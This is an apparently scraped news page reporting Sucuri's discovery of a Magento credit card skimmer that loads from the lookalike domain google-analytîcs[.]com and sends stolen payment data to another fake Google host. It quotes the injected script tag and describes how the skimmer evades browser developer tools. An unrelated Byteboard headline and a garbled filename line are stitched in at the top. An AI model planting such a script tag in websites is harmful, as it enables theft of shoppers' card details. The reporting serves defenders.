’s Byteboard aims to take the pain out of hiring for managers – and candidates
The experimental tool is meant to help making finding a new programmer that little bit easier.
- googles byteboard aims to take the pain 5d36e8b2b4b6ed00019d6944 1 jul 23 2019 11 59 48 poster - Malicious ‘Google’ domains used in Magento card card skimmer attacks

Threat actors are using but convincing Google domains to fool website visitors into thinking infected websites are safe when making online transactions. 

On Thursday, researchers from Sucuri said in a recent case reported by a Magento website owner, a domain had been infected with a credit card skimmer making use of JavaScript code containing a link to the malicious internationalized google-analytîcs[.]com website address.

An example of the code is below:

< script type=” text/javascript ” src =” //google-analytîcs.com/www.[redacted].com/3f5cf467d5d9.js ” > < /script>

“Website visitors may see a reputable name (like “Google”) in requests and assume that they’re safe to load, without noticing that the domain is not a perfect match and is actually malicious in nature,” the researchers say. 

TechRepublic: 60% of companies experienced insider attacks in the last year

The website owner was made aware of a problem after being blacklisted. Sucuri’s investigation revealed the capture element of the card skimmer is similar to others in the wild and uses Javascript to covertly siphon and store any input as well as drop-down menu selections. 

However, the code will change tactics depending on whether developer tools in either the Google Chrome or Mozilla Firefox browser are in use. The skimmer will not attempt to grab any information in these scenarios, which is likely an attempt to avoid detection. 

CNET: Russia targeted elections systems in all 50 states, Senate report says

The card skimmer supports “dozens” of payment gateways, Sucuri says, and if developer tools are not detected, stolen information is sent to a remote server — once again disguised with another fraudulent domain, google[.]ssl[.]lnfo[.]cc. 

See also: US AG Barr demands tech firms break encryption, ‘it can and must be done’

Card skimmers, installed through vulnerable e-commerce websites, are a widespread occurrence. In July, RiskIQ said a recent ‘spray-and-pray’ campaign proved to be successful for the Magecart hacking group, which had managed to infect over 17,000 websites with card-skimming malware in just a few months.

Magento users, in the same way as WordPress and Drupal, are always advised to keep their software builds up-to-date. Magento domains are a common target of cyberattackers seeking to harvest financial data, with an estimated 83 percent of Magento websites reported as vulnerable to skimmers in 2018.

ZDNet has reached out to Google and will update if we hear back.

Previous and related coverage


Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0




Source link

No tags for this post.

LEAVE A REPLY

Please enter your comment!
Please enter your name here